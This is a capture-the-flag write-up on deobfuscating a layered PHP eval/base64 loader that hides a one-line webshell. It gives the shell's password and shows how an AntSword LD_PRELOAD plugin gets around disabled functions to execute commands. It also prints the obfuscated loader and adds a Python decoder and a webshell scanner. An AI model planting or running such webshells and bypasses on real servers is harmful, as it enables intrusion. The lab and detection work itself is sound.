Bugku-CTF getshell

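Challenge:

Approach:

The PHP code is obfuscated, so the first step is to deobfuscate it. Start by printing the variable `$BwltqOYbHaQkRPNoxcfnFmzsIjhdMDAWUeKGgviVrJZpLuXETSyC`: it turns out to be simply base64 decoding of the string in the middle.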


```php
$NviuywCePWEGlacAmfjrgBMTYXzHZpIxDqQnsUKkhotFSORdVJLb="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";
eval('?>'.$BwltqOYbHaQkRPNoxcfnFmzsIjhdMDAWUeKGgviVrJZpLuXETSyC($hYXlTgBqWApObxJvejPRSdHGQnauDisfENIFyocrkULwmKMCtVzZ($vNwTOsKPEAlLciJDBhWtRSHXempIrjyQUuGoaknYCdFzqZMxfbgV($NviuywCePWEGlacAmfjrgBMTYXzHZpIxDqQnsUKkhotFSORdVJLb,$ciMfTXpPoJHzZBxLOvngjQCbdIGkYlVNSumFrAUeWasKyEtwhDqR*2),$vNwTOsKPEAlLciJDBhWtRSHXempIrjyQUuGoaknYCdFzqZMxfbgV($NviuywCePWEGlacAmfjrgBMTYXzHZpIxDqQnsUKkhotFSORdVJLb,$ciMfTXpPoJHzZBxLOvngjQCbdIGkYlVNSumFrAUeWasKyEtwhDqR,$ciMfTXpPoJHzZBxLOvngjQCbdIGkYlVNSumFrAUeWasKyEtwhDqR),$vNwTOsKPEAlLciJDBhWtRSHXempIrjyQUuGoaknYCdFzqZMxfbgV($NviuywCePWEGlacAmfjrgBMTYXzHZpIxDqQnsUKkhotFSORdVJLb,0,$ciMfTXpPoJHzZBxLOvngjQCbdIGkYlVNSumFrAUeWasKyEtwhDqR))));
```

Then continue by deobfuscating what this returns, as follows:

```php
echo ('?>'.$BwltqOYbHaQkRPNoxcfnFmzsIjhdMDAWUeKGgviVrJZpLuXETSyC($hYXlTgBqWApObxJvejPRSdHGQnauDisfENIFyocrkULwmKMCtVzZ($vNwTOsKPEAlLciJDBhWtRSHXempIrjyQUuGoaknYCdFzqZMxfbgV($NviuywCePWEGlacAmfjrgBMTYXzHZpIxDqQnsUKkhotFSORdVJLb,$ciMfTXpPoJHzZBxLOvngjQCbdIGkYlVNSumFrAUeWasKyEtwhDqR*2),$vNwTOsKPEAlLciJDBhWtRSHXempIrjyQUuGoaknYCdFzqZMxfbgV($NviuywCePWEGlacAmfjrgBMTYXzHZpIxDqQnsUKkhotFSORdVJLb,$ciMfTXpPoJHzZBxLOvngjQCbdIGkYlVNSumFrAUeWasKyEtwhDqR,$ciMfTXpPoJHzZBxLOvngjQCbdIGkYlVNSumFrAUeWasKyEtwhDqR),$vNwTOsKPEAlLciJDBhWtRSHXempIrjyQUuGoaknYCdFzqZMxfbgV($NviuywCePWEGlacAmfjrgBMTYXzHZpIxDqQnsUKkhotFSORdVJLb,0,$ciMfTXpPoJHzZBxLOvngjQCbdIGkYlVNSumFrAUeWasKyEtwhDqR))));

?>
```


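This yields the long string below; beautify it with [PHP online beautify, obfuscate, encrypt, decrypt - Online Tools](https://tool.lu/php/).

Then directly print the result of what the eval executes.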


The result is as follows:

```php
$FNhvZGJgVQUmzrpljeqkOYMSIbTtosKLBxRWaHiCcEDudXAwPyfn="ZnzvrDesIiMmAJPCtVpXwSQGalULhWodycFETxgYubRBHKOkNjfqsaRJyYqOKcUrmWAvlbgfMPFHowthjVdiTIpXBEnQZzSLuGkCDeNxAY9MoumnAR4=";
eval('?>'.$ayNqneorDHxFBSwcKhLjJPtOiCfYAgZvblXURTWVmpEMQGkzIdsu($YGZHvipCuzOVqrWTQFlfyBItPshbcxeJMKaEXomwRgnUkSdALNDj($TdpMJkhXEqZNcPaxbyKWGzVtegQnrYLOFiujDCmHRlwABoUIvSsf($FNhvZGJgVQUmzrpljeqkOYMSIbTtosKLBxRWaHiCcEDudXAwPyfn,$szecmYuarlxFUIWyobtfnLNJQTCDvPkVSGHgEZiXhOMKwpBdAjqR*2),$TdpMJkhXEqZNcPaxbyKWGzVtegQnrYLOFiujDCmHRlwABoUIvSsf($FNhvZGJgVQUmzrpljeqkOYMSIbTtosKLBxRWaHiCcEDudXAwPyfn,$szecmYuarlxFUIWyobtfnLNJQTCDvPkVSGHgEZiXhOMKwpBdAjqR,$szecmYuarlxFUIWyobtfnLNJQTCDvPkVSGHgEZiXhOMKwpBdAjqR),$TdpMJkhXEqZNcPaxbyKWGzVtegQnrYLOFiujDCmHRlwABoUIvSsf($FNhvZGJgVQUmzrpljeqkOYMSIbTtosKLBxRWaHiCcEDudXAwPyfn,0,$szecmYuarlxFUIWyobtfnLNJQTCDvPkVSGHgEZiXhOMKwpBdAjqR))));
$HfuSgMBOxhovrtnmYzkUGFEZsiDXyJIlbKCWjpVLPTwcqeaNARdQ="WtCxsqEuLNTSGRkVfZKHjUYPIognBiFhrbyOXacAelmwpJdzvQDMFbRYnLeWuGTKsNZvOpcgErtXBxCQljVfDwSmyqHikPMzdJaIoAhUXh9zqgiGRMfdp2fnqFaxaV9MqFYPcs5LvQPIAPd2kgJUq0pppe5opMGQN3vfa0NctMYzT1GNNrfKvF1uqrVxkZPhpyNATyVtv1Admz0cAsv2tFzxJV9AT1GrF3PbwsPIqyGdH2Pow2bacTn=";
eval('?>'.$HbXdtGUkeEDlRgpwsarfnVYoTSKIcPvhCWjBizQLZxFMuymANqJO($IoceCnqVKOFkrlRjUPEdNhAuSMJBzmGvTLytisgpZYbQXHfDwWxa($DcbyPNpYSKuECvekIVZlOQFTMwgXinAfaoHdzqhGWRrLsmJBjUtx($HfuSgMBOxhovrtnmYzkUGFEZsiDXyJIlbKCWjpVLPTwcqeaNARdQ,$kcwKbSghWizYEuAGDOTFaHXQRtnLyBlJpCImejsrNvZqPUVxfMdo*2),$DcbyPNpYSKuECvekIVZlOQFTMwgXinAfaoHdzqhGWRrLsmJBjUtx($HfuSgMBOxhovrtnmYzkUGFEZsiDXyJIlbKCWjpVLPTwcqeaNARdQ,$kcwKbSghWizYEuAGDOTFaHXQRtnLyBlJpCImejsrNvZqPUVxfMdo,$kcwKbSghWizYEuAGDOTFaHXQRtnLyBlJpCImejsrNvZqPUVxfMdo),$DcbyPNpYSKuECvekIVZlOQFTMwgXinAfaoHdzqhGWRrLsmJBjUtx($HfuSgMBOxhovrtnmYzkUGFEZsiDXyJIlbKCWjpVLPTwcqeaNARdQ,0,$kcwKbSghWizYEuAGDOTFaHXQRtnLyBlJpCImejsrNvZqPUVxfMdo))));
```

Continue deobfuscating: again, print these two evals to see what they execute.

```php
echo ('?>'.$ayNqneorDHxFBSwcKhLjJPtOiCfYAgZvblXURTWVmpEMQGkzIdsu($YGZHvipCuzOVqrWTQFlfyBItPshbcxeJMKaEXomwRgnUkSdALNDj($TdpMJkhXEqZNcPaxbyKWGzVtegQnrYLOFiujDCmHRlwABoUIvSsf($FNhvZGJgVQUmzrpljeqkOYMSIbTtosKLBxRWaHiCcEDudXAwPyfn,$szecmYuarlxFUIWyobtfnLNJQTCDvPkVSGHgEZiXhOMKwpBdAjqR*2),$TdpMJkhXEqZNcPaxbyKWGzVtegQnrYLOFiujDCmHRlwABoUIvSsf($FNhvZGJgVQUmzrpljeqkOYMSIbTtosKLBxRWaHiCcEDudXAwPyfn,$szecmYuarlxFUIWyobtfnLNJQTCDvPkVSGHgEZiXhOMKwpBdAjqR,$szecmYuarlxFUIWyobtfnLNJQTCDvPkVSGHgEZiXhOMKwpBdAjqR),$TdpMJkhXEqZNcPaxbyKWGzVtegQnrYLOFiujDCmHRlwABoUIvSsf($FNhvZGJgVQUmzrpljeqkOYMSIbTtosKLBxRWaHiCcEDudXAwPyfn,0,$szecmYuarlxFUIWyobtfnLNJQTCDvPkVSGHgEZiXhOMKwpBdAjqR))));
$HfuSgMBOxhovrtnmYzkUGFEZsiDXyJIlbKCWjpVLPTwcqeaNARdQ="WtCxsqEuLNTSGRkVfZKHjUYPIognBiFhrbyOXacAelmwpJdzvQDMFbRYnLeWuGTKsNZvOpcgErtXBxCQljVfDwSmyqHikPMzdJaIoAhUXh9zqgiGRMfdp2fnqFaxaV9MqFYPcs5LvQPIAPd2kgJUq0pppe5opMGQN3vfa0NctMYzT1GNNrfKvF1uqrVxkZPhpyNATyVtv1Admz0cAsv2tFzxJV9AT1GrF3PbwsPIqyGdH2Pow2bacTn=";
echo ('?>'.$HbXdtGUkeEDlRgpwsarfnVYoTSKIcPvhCWjBizQLZxFMuymANqJO($IoceCnqVKOFkrlRjUPEdNhAuSMJBzmGvTLytisgpZYbQXHfDwWxa($DcbyPNpYSKuECvekIVZlOQFTMwgXinAfaoHdzqhGWRrLsmJBjUtx($HfuSgMBOxhovrtnmYzkUGFEZsiDXyJIlbKCWjpVLPTwcqeaNARdQ,$kcwKbSghWizYEuAGDOTFaHXQRtnLyBlJpCImejsrNvZqPUVxfMdo*2),$DcbyPNpYSKuECvekIVZlOQFTMwgXinAfaoHdzqhGWRrLsmJBjUtx($HfuSgMBOxhovrtnmYzkUGFEZsiDXyJIlbKCWjpVLPTwcqeaNARdQ,$kcwKbSghWizYEuAGDOTFaHXQRtnLyBlJpCImejsrNvZqPUVxfMdo,$kcwKbSghWizYEuAGDOTFaHXQRtnLyBlJpCImejsrNvZqPUVxfMdo),$DcbyPNpYSKuECvekIVZlOQFTMwgXinAfaoHdzqhGWRrLsmJBjUtx($HfuSgMBOxhovrtnmYzkUGFEZsiDXyJIlbKCWjpVLPTwcqeaNARdQ,0,$kcwKbSghWizYEuAGDOTFaHXQRtnLyBlJpCImejsrNvZqPUVxfMdo))));
```
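
The same layer can be decoded statically, without running any of the sample's `eval`/`echo` code. The sketch below is an added example, not code from the original post: it assumes the three hidden function-name variables resolve to `base64_decode`, `strtr` and `substr` and that the hidden length variable is 52 (the post itself only identifies the base64 decoding), and it takes the short `$FNhv...` blob shown above as input.

```python
import base64
import re

# Blob copied from the $FNhv... assignment shown on this page.
PAGE_BLOB = (
    "ZnzvrDesIiMmAJPCtVpXwSQGalULhWodycFETxgYubRBHKOkNjfq"   # substr(s, 0, n)
    "saRJyYqOKcUrmWAvlbgfMPFHowthjVdiTIpXBEnQZzSLuGkCDeNx"   # substr(s, n, n)
    "AY9MoumnAR4="                                            # substr(s, 2n)
)
ALPHABET_LEN = 52  # assumption: value held by the hidden length variable


def decode_layer(blob, n=ALPHABET_LEN):
    """Static form of base64_decode(strtr(substr(s,2n), substr(s,n,n), substr(s,0,n)))."""
    to_chars, from_chars, body = blob[:n], blob[n:2 * n], blob[2 * n:]
    if len(set(from_chars)) != n or sorted(from_chars) != sorted(to_chars):
        raise ValueError("blob does not start with two permutations of one alphabet")
    table = str.maketrans(from_chars, to_chars)  # same mapping as strtr(body, from, to)
    return base64.b64decode(body.translate(table), validate=True)


ASSIGN_RE = re.compile(r'\$(\w+)\s*=\s*"([A-Za-z0-9+/=]+)"\s*;')


def decode_all(php_source):
    """Decode every quoted assignment that fits the layout; skip the others."""
    decoded = {}
    for name, blob in ASSIGN_RE.findall(php_source):
        try:
            decoded[name] = decode_layer(blob)
        except ValueError:  # wrong layout or invalid base64 (binascii.Error)
            continue
    return decoded


# Constructed input: the page's blob under a short name plus an unrelated string.
SAMPLE_SOURCE = (
    '$stage="%s";\neval(\'?>\'.$f($g($h($stage,$n*2))));\n$title="hello";' % PAGE_BLOB
)

if __name__ == "__main__":
    for var, php in decode_all(SAMPLE_SOURCE).items():
        print(var, "->", php.decode("utf-8", "replace"))
```

For the short blob above, `decode_layer` returns `<?php ?>`.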


?>?>

This is the source code we were after: a one-line webshell whose password is ymlisisisiook.

Command execution gets no response, so take a look at phpinfo first.


Many functions are disabled here, and the system function used above is disabled as well. This can be bypassed with an AntSword plugin, disable_functions.


Connect directly with AntSword; at this point command execution does not work.


Then select the plugin.


Select LD_PRELOAD mode and click Start; the proxy script `.antproxy.php` is uploaded successfully.


The directory now contains an additional .antproxy.php; access url/.antproxy.php directly.


Commands can now be executed directly. This step can also be done by connecting with AntSword again; the password is still ymlisisisiook from above.


flag: flag{5710bb9cd7a8717e5ceeb54c65529606}
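
For defenders, both artifacts in this write-up can be triaged on disk: the obfuscated loader has the `eval('?>'.$a($b(` shape with very long random variable names, and the plugin leaves a hidden `.antproxy.php` in the web directory. The scanner below is an added example, not part of the original post; the finding labels, the length threshold and the sample files are constructed.

```python
import os
import re

# eval('?>' . $a($b( ... : eval fed by nested variable-function calls
EVAL_CHAIN_RE = re.compile(r"""eval\s*\(\s*['"]\?>['"]\s*\.\s*\$\w+\s*\(\s*\$\w+\s*\(""")
LONG_VAR_RE = re.compile(r"\$[A-Za-z]{40,}")  # constructed threshold; the page's names are 52 letters
PHP_EXTENSIONS = (".php", ".phtml")


def triage_file(path):
    """Return the list of findings for one PHP file."""
    findings = []
    name = os.path.basename(path)
    if name.startswith(".") and name.lower().endswith(PHP_EXTENSIONS):
        findings.append("hidden-php-file")  # e.g. .antproxy.php
    with open(path, "r", errors="replace") as fh:
        text = fh.read()
    if EVAL_CHAIN_RE.search(text):
        findings.append("eval-variable-function-chain")
    if len(set(LONG_VAR_RE.findall(text))) >= 3:
        findings.append("random-long-identifiers")
    return findings


def triage_webroot(root):
    """Walk a web root and map relative path -> findings for flagged files."""
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        for fn in files:
            if fn.lower().endswith(PHP_EXTENSIONS):
                path = os.path.join(dirpath, fn)
                findings = triage_file(path)
                if findings:
                    report[os.path.relpath(path, root)] = findings
    return report


def build_sample_webroot(root):
    """Write three constructed files: benign page, obfuscated loader, hidden proxy."""
    v = ["$" + c * 52 for c in "abcde"]  # constructed stand-ins for the random names
    loader = "<?php %s=\"QUJD\"; eval('?>'.%s(%s(%s(%s,%s*2))));" % (v[0], v[1], v[2], v[3], v[0], v[4])
    samples = {"index.php": "<?php echo 'hello'; ?>",
               os.path.join("upload", "shell.php"): loader,
               ".antproxy.php": "<?php /* constructed placeholder */ ?>"}
    for rel, body in samples.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write(body)
```

Call `build_sample_webroot` on an empty temporary directory and then `triage_webroot` on the same path to see the two flagged files; the benign `index.php` is not reported.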

玄机博客